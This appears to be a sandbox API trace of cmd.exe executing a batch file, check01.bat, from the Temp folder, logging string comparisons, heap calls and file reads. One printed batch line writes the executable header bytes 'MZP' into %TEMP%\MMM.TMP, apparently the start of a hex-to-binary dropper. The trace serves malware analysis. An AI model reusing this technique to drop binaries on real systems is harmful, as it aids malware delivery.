[0375.563] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84
[0375.563] _wcsicmp (_String1="\"C", _String2="VER") returned -84
[0375.564] _wcsicmp (_String1="\"C", _String2="VOL") returned -84
[0375.564] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67
[0375.564] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81
[0375.564] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67
[0375.564] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82
[0375.564] _wcsicmp (_String1="\"C", _String2="START") returned -81
[0375.564] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66
[0375.564] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73
[0375.564] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75
[0375.564] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78
[0375.564] _wcsicmp (_String1="\"C", _String2="POPD") returned -78
[0375.564] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63
[0375.564] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68
[0375.564] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64
[0375.564] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65
[0375.564] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75
[0375.565] _wcsicmp (_String1="\"C", _String2="FOR") returned -68
[0375.565] _wcsicmp (_String1="\"C", _String2="IF") returned -71
[0375.565] _wcsicmp (_String1="\"C", _String2="REM") returned -80
[0375.565] GetProcessHeap () returned 0x200000
[0375.565] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x218) returned 0x219ef0
[0375.565] GetProcessHeap () returned 0x200000
[0375.565] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x7a) returned 0x21a110
[0375.569] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51
[0375.569] GetProcessHeap () returned 0x200000
[0375.569] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x420) returned 0x201320
[0375.569] SetErrorMode (uMode=0x0) returned 0x0
[0375.570] SetErrorMode (uMode=0x1) returned 0x0
[0375.570] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x201330, lpFilePart=0x1ef400 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x1ef400*="Temp") returned 0x24
[0375.570] SetErrorMode (uMode=0x0) returned 0x1
[0375.570] GetProcessHeap () returned 0x200000
[0375.570] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201320, Size=0x72) returned 0x201320
[0375.570] GetProcessHeap () returned 0x200000
[0375.570] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201320) returned 0x72
[0375.570] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\.") returned 1
[0375.570] GetProcessHeap () returned 0x200000
[0375.571] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x60) returned 0x21a1a0
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xac) returned 0x21a210
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21a210, Size=0x60) returned 0x21a210
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21a210) returned 0x60
[0375.571] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21a280
[0375.585] GetProcessHeap () returned 0x200000
[0375.585] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21a280, Size=0x7e) returned 0x21a280
[0375.585] GetProcessHeap () returned 0x200000
[0375.585] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21a280) returned 0x7e
[0375.586] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0375.586] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), fInfoLevelId=0x1, lpFindFileData=0x1ef170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef170) returned 0x21a310
[0375.586] GetProcessHeap () returned 0x200000
[0375.586] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x28) returned 0x2146e0
[0375.586] FindClose (in: hFindFile=0x21a310 | out: hFindFile=0x21a310) returned 1
[0375.587] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1
[0375.587] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0
[0375.587] GetConsoleTitleW (in: lpConsoleTitle=0x1ef6c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.587] GetProcessHeap () returned 0x200000
[0375.587] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1e8) returned 0x2013b0
[0375.588] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff870000
[0375.601] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferIdentifyLevel") returned 0x7feff88e470
[0375.601] IdentifyCodeAuthzLevelW () returned 0x1
[0375.619] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferComputeTokenFromLevel") returned 0x7feff88f9b0
[0375.619] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
[0375.620] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferCloseLevel") returned 0x7feff88f660
[0375.620] CloseCodeAuthzLevel () returned 0x1
[0375.620] SetErrorMode (uMode=0x0) returned 0x0
[0375.621] SetErrorMode (uMode=0x1) returned 0x0
[0375.621] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x104, lpBuffer=0x219f00, lpFilePart=0x1ef4f0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x1ef4f0*="check01.bat") returned 0x30
[0375.621] SetErrorMode (uMode=0x0) returned 0x1
[0375.621] GetProcessHeap () returned 0x200000
[0375.621] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x76) returned 0x201c30
[0375.621] wcsspn (_String=" ", _Control=" \x09") returned 0x1
[0375.621] GetProcessHeap () returned 0x200000
[0375.621] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x12) returned 0x22a370
[0375.621] GetProcessHeap () returned 0x200000
[0375.621] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x14) returned 0x22a390
[0375.621] GetProcessHeap () returned 0x200000
[0375.622] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x22a390, Size=0x14) returned 0x22a3b0
[0375.622] GetProcessHeap () returned 0x200000
[0375.622] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x22a3b0) returned 0x14
[0375.622] CmdBatNotification () returned 0x0
[0375.623] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60
[0375.623] _open_osfhandle (_OSFileHandle=0x60, _Flags=8) returned 3
[0375.623] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.623] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0375.623] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.623] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0375.624] ReadFile (in: hFile=0x60, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xf32, lpOverlapped=0x0) returned 1
[0375.626] SetFilePointer (in: hFile=0x60, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.627] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@echo off\r\n", cbMultiByte=11, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11
[0375.627] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.627] GetFileType (hFile=0x60) returned 0x1
[0375.627] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.627] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.628] GetProcessHeap () returned 0x200000
[0375.628] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x21c5b0
[0375.628] GetProcessHeap () returned 0x200000
[0375.629] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c5b0 | out: hHeap=0x200000) returned 1
[0375.629] GetProcessHeap () returned 0x200000
[0375.629] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x201cb0
[0375.630] _wcsicmp (_String1="echo", _String2=")") returned 60
[0375.630] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0375.631] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0375.631] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0375.631] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0375.631] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0375.631] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0375.631] GetProcessHeap () returned 0x200000
[0375.631] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x201d70
[0375.631] GetProcessHeap () returned 0x200000
[0375.631] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x214710
[0375.631] GetProcessHeap () returned 0x200000
[0375.631] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b060
[0375.635] _tell (_FileHandle=3) returned 11
[0375.635] _close (_FileHandle=3) returned 0
[0375.635] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0375.635] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0375.635] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0375.635] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0375.636] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0375.636] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0375.636] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0375.636] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0375.636] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0375.636] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0375.636] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.637] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0375.637] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0375.637] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0375.637] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0375.637] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0375.637] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0375.637] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0375.637] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0375.637] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0375.638] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0375.638] GetProcessHeap () returned 0x200000
[0375.638] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b090
[0375.639] GetProcessHeap () returned 0x200000
[0375.639] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21b090, Size=0x1a) returned 0x21b0c0
[0375.639] GetProcessHeap () returned 0x200000
[0375.639] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b0c0) returned 0x1a
[0375.639] GetProcessHeap () returned 0x200000
[0375.639] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b090
[0375.639] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0
[0375.639] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.639] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0375.640] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.640] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0375.641] _get_osfhandle (_FileHandle=0) returned 0x3
[0375.641] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0375.641] SetConsoleInputExeNameW () returned 0x1
[0375.641] GetConsoleOutputCP () returned 0x1b5
[0375.642] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0375.642] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0375.642] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60
[0375.642] _open_osfhandle (_OSFileHandle=0x60, _Flags=8) returned 3
[0375.642] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.642] SetFilePointer (in: hFile=0x60, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b060 | out: hHeap=0x200000) returned 1
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x214710 | out: hHeap=0x200000) returned 1
[0375.644] GetProcessHeap () returned 0x200000
[0375.644] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0375.644] GetProcessHeap () returned 0x200000
[0375.645] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201cb0 | out: hHeap=0x200000) returned 1
[0375.645] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.645] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.645] ReadFile (in: hFile=0x60, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xf27, lpOverlapped=0x0) returned 1
[0375.646] SetFilePointer (in: hFile=0x60, lDistanceToMove=51, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.646] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :writeHex 4D5A50 \"%TEMP%\\MMM.TMP\"\r\n", cbMultiByte=40, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="call :writeHex 4D5A50 \"%TEMP%\\MMM.TMP\"\r\n") returned 40
[0375.648] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.649] GetFileType (hFile=0x60) returned 0x1
[0375.649] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.649] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.649] GetProcessHeap () returned 0x200000
[0375.649] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x21c5b0
[0375.649] GetProcessHeap () returned 0x200000
[0375.649] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x22a820
[0375.650] GetProcessHeap () returned 0x200000
[0375.654] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x214710
[0375.655] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0375.655] GetProcessHeap () returned 0x200000
[0375.655] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x214710 | out: hHeap=0x200000) returned 1
[0375.655] GetProcessHeap () returned 0x200000
[0375.655] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a820 | out: hHeap=0x200000) returned 1
[0375.655] GetProcessHeap () returned 0x200000
[0375.656] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c5b0 | out: hHeap=0x200000) returned 1
[0375.657] _wcsicmp (_String1="call", _String2=")") returned 58
[0375.657] _wcsicmp (_String1="FOR", _String2="call") returned 3
[0375.657] _wcsicmp (_String1="FOR/?", _String2="call") returned 3
[0375.657] _wcsicmp (_String1="IF", _String2="call") returned 6
[0375.657] _wcsicmp (_String1="IF/?", _String2="call") returned 6
[0375.657] _wcsicmp (_String1="REM", _String2="call") returned 15
[0375.657] _wcsicmp (_String1="REM/?", _String2="call") returned 15
[0375.657] GetProcessHeap () returned 0x200000
[0375.657] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x201cb0
[0375.657] GetProcessHeap () returned 0x200000
[0375.657] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x214710
[0375.662] GetProcessHeap () returned 0x200000
[0375.662] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x92) returned 0x201d70
[0375.664] _tell (_FileHandle=3) returned 51
[0375.664] _close (_FileHandle=3) returned 0
[0375.665] _wcsicmp (_String1="call", _String2="DIR") returned -1
[0375.665] _wcsicmp (_String1="call", _String2="ERASE") returned -2
[0375.665] _wcsicmp (_String1="call", _String2="DEL") returned -1
[0375.665] _wcsicmp (_String1="call", _String2="TYPE") returned -17
[0375.665] _wcsicmp (_String1="call", _String2="COPY") returned -14
[0375.665] _wcsicmp (_String1="call", _String2="CD") returned -3
[0375.665] _wcsicmp (_String1="call", _String2="CHDIR") returned -7
[0375.665] _wcsicmp (_String1="call", _String2="RENAME") returned -15
[0375.665] _wcsicmp (_String1="call", _String2="REN") returned -15
[0375.665] _wcsicmp (_String1="call", _String2="ECHO") returned -2
[0375.665] _wcsicmp (_String1="call", _String2="SET") returned -16
[0375.665] _wcsicmp (_String1="call", _String2="PAUSE") returned -13
[0375.665] _wcsicmp (_String1="call", _String2="DATE") returned -1
[0375.665] _wcsicmp (_String1="call", _String2="TIME") returned -17
[0375.666] _wcsicmp (_String1="call", _String2="PROMPT") returned -13
[0375.666] _wcsicmp (_String1="call", _String2="MD") returned -10
[0375.666] _wcsicmp (_String1="call", _String2="MKDIR") returned -10
[0375.666] _wcsicmp (_String1="call", _String2="RD") returned -15
[0375.666] _wcsicmp (_String1="call", _String2="RMDIR") returned -15
[0375.666] _wcsicmp (_String1="call", _String2="PATH") returned -13
[0375.666] _wcsicmp (_String1="call", _String2="GOTO") returned -4
[0375.666] _wcsicmp (_String1="call", _String2="SHIFT") returned -16
[0375.666] _wcsicmp (_String1="call", _String2="CLS") returned -11
[0375.666] _wcsicmp (_String1="call", _String2="CALL") returned 0
[0375.666] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.667] _wcsicmp (_String1="call", _String2="DIR") returned -1
[0375.667] _wcsicmp (_String1="call", _String2="ERASE") returned -2
[0375.667] _wcsicmp (_String1="call", _String2="DEL") returned -1
[0375.667] _wcsicmp (_String1="call", _String2="TYPE") returned -17
[0375.667] _wcsicmp (_String1="call", _String2="COPY") returned -14
[0375.667] _wcsicmp (_String1="call", _String2="CD") returned -3
[0375.667] _wcsicmp (_String1="call", _String2="CHDIR") returned -7
[0375.667] _wcsicmp (_String1="call", _String2="RENAME") returned -15
[0375.667] _wcsicmp (_String1="call", _String2="REN") returned -15
[0375.668] _wcsicmp (_String1="call", _String2="ECHO") returned -2
[0375.668] _wcsicmp (_String1="call", _String2="SET") returned -16
[0375.668] _wcsicmp (_String1="call", _String2="PAUSE") returned -13
[0375.668] _wcsicmp (_String1="call", _String2="DATE") returned -1
[0375.668] _wcsicmp (_String1="call", _String2="TIME") returned -17
[0375.668] _wcsicmp (_String1="call", _String2="PROMPT") returned -13
[0375.668] _wcsicmp (_String1="call", _String2="MD") returned -10
[0375.668] _wcsicmp (_String1="call", _String2="MKDIR") returned -10
[0375.668] _wcsicmp (_String1="call", _String2="RD") returned -15
[0375.668] _wcsicmp (_String1="call", _String2="RMDIR") returned -15
[0375.668] _wcsicmp (_String1="call", _String2="PATH") returned -13
[0375.668] _wcsicmp (_String1="call", _String2="GOTO") returned -4
[0375.668] _wcsicmp (_String1="call", _String2="SHIFT") returned -16
[0375.668] _wcsicmp (_String1="call", _String2="CLS") returned -11
[0375.668] _wcsicmp (_String1="call", _String2="CALL") returned 0
[0375.668] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x114) returned 0x21c5b0
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21c5b0, Size=0x92) returned 0x21c5b0
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21c5b0) returned 0x92
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x9c) returned 0x21c660
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x218) returned 0x21c710
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22a820
[0375.670] GetProcessHeap () returned 0x200000
[0375.670] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a820 | out: hHeap=0x200000) returned 1
[0375.671] IdentifyCodeAuthzLevelW () returned 0x1
[0375.681] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
[0375.681] CloseCodeAuthzLevel () returned 0x1
[0375.681] GetProcessHeap () returned 0x200000
[0375.681] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b0c0
[0375.681] wcsspn (_String=" 4D5A50 \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"", _Control=" \x09") returned 0x1
[0375.681] GetProcessHeap () returned 0x200000
[0375.681] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x7c) returned 0x21cc70
[0375.681] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21cd00
[0375.682] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cd00, Size=0x7e) returned 0x21cd00
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cd00) returned 0x7e
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x21cd90
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b090
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b0f0
[0375.682] _wcsicmp (_String1="GOTO", _String2="DIR") returned 3
[0375.683] _wcsicmp (_String1="GOTO", _String2="ERASE") returned 2
[0375.683] _wcsicmp (_String1="GOTO", _String2="DEL") returned 3
[0375.683] _wcsicmp (_String1="GOTO", _String2="TYPE") returned -13
[0375.683] _wcsicmp (_String1="GOTO", _String2="COPY") returned 4
[0375.683] _wcsicmp (_String1="GOTO", _String2="CD") returned 4
[0375.683] _wcsicmp (_String1="GOTO", _String2="CHDIR") returned 4
[0375.683] _wcsicmp (_String1="GOTO", _String2="RENAME") returned -11
[0375.683] _wcsicmp (_String1="GOTO", _String2="REN") returned -11
[0375.683] _wcsicmp (_String1="GOTO", _String2="ECHO") returned 2
[0375.683] _wcsicmp (_String1="GOTO", _String2="SET") returned -12
[0375.683] _wcsicmp (_String1="GOTO", _String2="PAUSE") returned -9
[0375.683] _wcsicmp (_String1="GOTO", _String2="DATE") returned 3
[0375.683] _wcsicmp (_String1="GOTO", _String2="TIME") returned -13
[0375.683] _wcsicmp (_String1="GOTO", _String2="PROMPT") returned -9
[0375.683] _wcsicmp (_String1="GOTO", _String2="MD") returned -6
[0375.683] _wcsicmp (_String1="GOTO", _String2="MKDIR") returned -6
[0375.684] _wcsicmp (_String1="GOTO", _String2="RD") returned -11
[0375.684] _wcsicmp (_String1="GOTO", _String2="RMDIR") returned -11
[0375.684] _wcsicmp (_String1="GOTO", _String2="PATH") returned -9
[0375.684] _wcsicmp (_String1="GOTO", _String2="GOTO") returned 0
[0375.684] GetConsoleTitleW (in: lpConsoleTitle=0x1eecd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.685] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x216cf0, Size=0x24) returned 0x21b120
[0375.685] GetProcessHeap () returned 0x200000
[0375.685] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b120) returned 0x24
[0375.685] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee788, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c
[0375.685] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3
[0375.685] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] SetFilePointer (in: hFile=0x5c, lDistanceToMove=51, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.686] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf32
[0375.686] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.686] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] GetFileType (hFile=0x5c) returned 0x1
[0375.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.687] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=61, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
